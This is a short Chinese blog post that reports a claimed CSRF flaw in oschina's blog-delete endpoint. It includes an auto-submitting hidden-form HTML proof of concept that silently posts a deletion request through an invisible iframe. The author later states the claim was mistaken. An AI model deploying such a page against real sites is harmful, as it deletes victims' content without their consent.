oschina删除文章的csrf漏洞

学习用,不得用于损害oschina用户的利益


csrf是一种常见且危害较大的网络攻击行为

文章来源: http://yangsui.me/oschina-csrf-2.html

已经证明我文章描述有误,oschina是防csrf工具的


我的blog编辑器有的问题,贴的代码被转义了,大家如果查看代码不方面,可以看看我下面的代码,只是几个参数不同,其它完全一样。

  

<html>
	<head>
		<script>
			function submitform(){
				document.getElementById("form1").submit()
			}
		</script>
	</head>
	<body onload="submitform()">
		<h1>Delete content from csrf</h1>
		<form id="form1" action="http://my.oschina.net/action/blog/delete" method="post" target="hiddenframe">
			<input type="hidden" name="id" value="200555" />
			<input type="hidden" name="user_code" value="2jOugKBiY0rm9TxYZiV1LvMOfZBQvuZpJpappXiV" />
			<input type="hidden" name="user" value="166550">
		</form>
		<iframe frameborder="0" height="0" width="0" name="hiddenframe"></iframe>
	</body>
</html>

 

  还是那句话,用于研究技术,不作它途

   

转载于:https://my.oschina.net/niuge/blog/200557

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值